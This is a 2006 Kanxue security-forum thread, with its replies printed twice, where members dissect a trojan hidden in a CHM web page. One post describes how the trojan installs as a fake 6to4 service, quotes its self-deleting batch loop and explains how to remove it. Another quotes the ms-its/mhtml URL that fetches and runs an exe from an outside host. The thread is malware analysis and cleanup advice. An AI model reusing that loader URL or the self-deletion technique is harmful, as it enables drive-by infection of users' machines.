谁有空分析一下rootkit-加壳脱壳-看雪-安全社区|安全招聘|kanxue.com

最新回复 (16)
loveboom 雪币： 513 活跃值： (2258) 能力值： ( LV9，RANK：2130 ) 在线值：发帖 100 回帖 687 粉丝 10 关注私信	loveboom 53 2 楼无法下载，能下载者贴个附件上来 2006-5-5 22:50 0
DarkNess0ut 雪币： 367 活跃值： (42) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 212 粉丝 2 关注私信	DarkNess0ut 3 楼可以直接下载jpg 后缀改成chm 反编译得到4个文件,不要碰htm,先改exe文件名 2006-5-6 01:43 0
thinkSJ 雪币： 196 活跃值： (135) 能力值： ( LV10，RANK：170 ) 在线值：发帖 9 回帖 611 粉丝 1 关注私信	thinkSJ 4 4 楼楼上的能不能上传一个. 2006-5-6 06:03 0
powder 雪币： 116 活跃值： (774) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 45 粉丝 2 关注私信	powder 5 楼 http://www.pupbt.com/down.asp?down=ac348b51bf3a5aaf 权限不够，不能使用附件功能，只好中转一下 2006-5-6 07:36 0
peaceclub 雪币： 255 活跃值： (207) 能力值： ( LV9，RANK：250 ) 在线值：发帖 59 回帖 967 粉丝 1 关注私信	peaceclub 6 6 楼文件做的很精致 chm网马中嵌木马,这个文件是用Upack压缩的. 2006-5-6 07:47 0
powder 雪币： 116 活跃值： (774) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 45 粉丝 2 关注私信	powder 7 楼已经搞定。文件释放TempDll371.dll，利用导出函数install安装自身为6to4服务，并复制w为系统目录下winmide32.dll和wins\wins.lib 使用批处理文件_Dll_Ins_DeleteMe__.bat删除自身。 :Retry del "D:\svchost.exe" if exist "D:\svchost.exe" goto Retry del "_Dll_Ins_DeleteMe__.bat" 删除很简单，在安全模式下删除文件 winmide32.dll,wins.lib并删除服务项6to4即可。 2006-5-6 08:46 0
鸡蛋壳雪币： 427 活跃值： (412) 能力值： ( LV2，RANK：10 ) 在线值：发帖 456 回帖 3147 粉丝 9 关注私信	鸡蛋壳 8 楼 http://webshell.cardb.cn/err_404.jpg::/svchost.exe 这是什么原理？ 2006-5-6 08:51 0
loveboom 雪币： 513 活跃值： (2258) 能力值： ( LV9，RANK：2130 ) 在线值：发帖 100 回帖 687 粉丝 10 关注私信	loveboom 53 9 楼 http://webshell.cardb.cn/err_404.jpg::/svchost.exe 这是什么原理？实际上就是一个chm文件里包含的exe文件。 2006-5-6 11:28 0
duzaizhe 雪币： 211 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 202 粉丝 0 关注私信	duzaizhe 10 楼 http://webshell.cardb.cn/err_404.jpg::/svchost.exe 这种地址第一次看到 2006-5-6 17:32 0
云重雪币： 213 活跃值： (96) 能力值： ( LV4，RANK：50 ) 在线值：发帖 3 回帖 258 粉丝 1 关注私信	云重 1 11 楼 2006-5-8 21:26 0
okdodo 雪币： 233 活跃值： (10) 能力值： ( LV6，RANK：90 ) 在线值：发帖 12 回帖 396 粉丝 1 关注私信	okdodo 2 12 楼见识了 2006-5-8 23:29 0
playx 雪币： 146 活跃值： (72) 能力值： ( LV4，RANK：50 ) 在线值：发帖 25 回帖 445 粉丝 0 关注私信	playx 1 13 楼呵呵，林子太大。 2006-5-8 23:51 0
axxer 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	axxer 14 楼最初由 duzaizhe* 发布* http://webshell.cardb.cn/err_404.jpg::/svchost.exe 这种地址第一次看到我也是第一次看到这种地址。。看上去楼主象是个玩hack和crack的高手。。 2006-5-10 11:34 0
peaceclub 雪币： 255 活跃值： (207) 能力值： ( LV9，RANK：250 ) 在线值：发帖 59 回帖 967 粉丝 1 关注私信	peaceclub 6 15 楼有没有搞错,断章取意,下面的才是地址: ms-its:mhtml:c:\\.mht!http://webshell.cardb.cn/err_404.jpg::/svchost.exe http://webshell.cardb.cn/err_404.jpg::/svchost.exe 单纯这样是没有意义的 2006-5-10 12:00 0
girl 雪币： 214 活跃值： (40) 能力值： ( LV4，RANK：50 ) 在线值：发帖 8 回帖 289 粉丝 0 关注私信	girl 1 16 楼最初由 axxer* 发布* 我也是第一次看到这种地址。。看上去楼主象是个玩hack和crack的高手。。楼上的才是哦 2006-5-10 12:01 0
爱一个人好难雪币： 0 能力值： (RANK：10 ) 在线值：发帖 30 回帖 463 粉丝 0 关注私信	爱一个人好难 17 楼在讨论hack?看不懂 2006-5-10 14:49 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (16)
loveboom 雪币： 513 活跃值： (2258) 能力值： ( LV9，RANK：2130 ) 在线值：发帖 100 回帖 687 粉丝 10 关注私信	loveboom 53 2 楼无法下载，能下载者贴个附件上来 2006-5-5 22:50 0
DarkNess0ut 雪币： 367 活跃值： (42) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 212 粉丝 2 关注私信	DarkNess0ut 3 楼可以直接下载jpg 后缀改成chm 反编译得到4个文件,不要碰htm,先改exe文件名 2006-5-6 01:43 0
thinkSJ 雪币： 196 活跃值： (135) 能力值： ( LV10，RANK：170 ) 在线值：发帖 9 回帖 611 粉丝 1 关注私信	thinkSJ 4 4 楼楼上的能不能上传一个. 2006-5-6 06:03 0
powder 雪币： 116 活跃值： (774) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 45 粉丝 2 关注私信	powder 5 楼 http://www.pupbt.com/down.asp?down=ac348b51bf3a5aaf 权限不够，不能使用附件功能，只好中转一下 2006-5-6 07:36 0
peaceclub 雪币： 255 活跃值： (207) 能力值： ( LV9，RANK：250 ) 在线值：发帖 59 回帖 967 粉丝 1 关注私信	peaceclub 6 6 楼文件做的很精致 chm网马中嵌木马,这个文件是用Upack压缩的. 2006-5-6 07:47 0
powder 雪币： 116 活跃值： (774) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 45 粉丝 2 关注私信	powder 7 楼已经搞定。文件释放TempDll371.dll，利用导出函数install安装自身为6to4服务，并复制w为系统目录下winmide32.dll和wins\wins.lib 使用批处理文件_Dll_Ins_DeleteMe__.bat删除自身。 :Retry del "D:\svchost.exe" if exist "D:\svchost.exe" goto Retry del "_Dll_Ins_DeleteMe__.bat" 删除很简单，在安全模式下删除文件 winmide32.dll,wins.lib并删除服务项6to4即可。 2006-5-6 08:46 0
鸡蛋壳雪币： 427 活跃值： (412) 能力值： ( LV2，RANK：10 ) 在线值：发帖 456 回帖 3147 粉丝 9 关注私信	鸡蛋壳 8 楼 http://webshell.cardb.cn/err_404.jpg::/svchost.exe 这是什么原理？ 2006-5-6 08:51 0
loveboom 雪币： 513 活跃值： (2258) 能力值： ( LV9，RANK：2130 ) 在线值：发帖 100 回帖 687 粉丝 10 关注私信	loveboom 53 9 楼 http://webshell.cardb.cn/err_404.jpg::/svchost.exe 这是什么原理？实际上就是一个chm文件里包含的exe文件。 2006-5-6 11:28 0
duzaizhe 雪币： 211 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 202 粉丝 0 关注私信	duzaizhe 10 楼 http://webshell.cardb.cn/err_404.jpg::/svchost.exe 这种地址第一次看到 2006-5-6 17:32 0
云重雪币： 213 活跃值： (96) 能力值： ( LV4，RANK：50 ) 在线值：发帖 3 回帖 258 粉丝 1 关注私信	云重 1 11 楼 2006-5-8 21:26 0
okdodo 雪币： 233 活跃值： (10) 能力值： ( LV6，RANK：90 ) 在线值：发帖 12 回帖 396 粉丝 1 关注私信	okdodo 2 12 楼见识了 2006-5-8 23:29 0
playx 雪币： 146 活跃值： (72) 能力值： ( LV4，RANK：50 ) 在线值：发帖 25 回帖 445 粉丝 0 关注私信	playx 1 13 楼呵呵，林子太大。 2006-5-8 23:51 0
axxer 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	axxer 14 楼最初由 duzaizhe* 发布* http://webshell.cardb.cn/err_404.jpg::/svchost.exe 这种地址第一次看到我也是第一次看到这种地址。。看上去楼主象是个玩hack和crack的高手。。 2006-5-10 11:34 0
peaceclub 雪币： 255 活跃值： (207) 能力值： ( LV9，RANK：250 ) 在线值：发帖 59 回帖 967 粉丝 1 关注私信	peaceclub 6 15 楼有没有搞错,断章取意,下面的才是地址: ms-its:mhtml:c:\\.mht!http://webshell.cardb.cn/err_404.jpg::/svchost.exe http://webshell.cardb.cn/err_404.jpg::/svchost.exe 单纯这样是没有意义的 2006-5-10 12:00 0
girl 雪币： 214 活跃值： (40) 能力值： ( LV4，RANK：50 ) 在线值：发帖 8 回帖 289 粉丝 0 关注私信	girl 1 16 楼最初由 axxer* 发布* 我也是第一次看到这种地址。。看上去楼主象是个玩hack和crack的高手。。楼上的才是哦 2006-5-10 12:01 0
爱一个人好难雪币： 0 能力值： (RANK：10 ) 在线值：发帖 30 回帖 463 粉丝 0 关注私信	爱一个人好难 17 楼在讨论hack?看不懂 2006-5-10 14:49 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复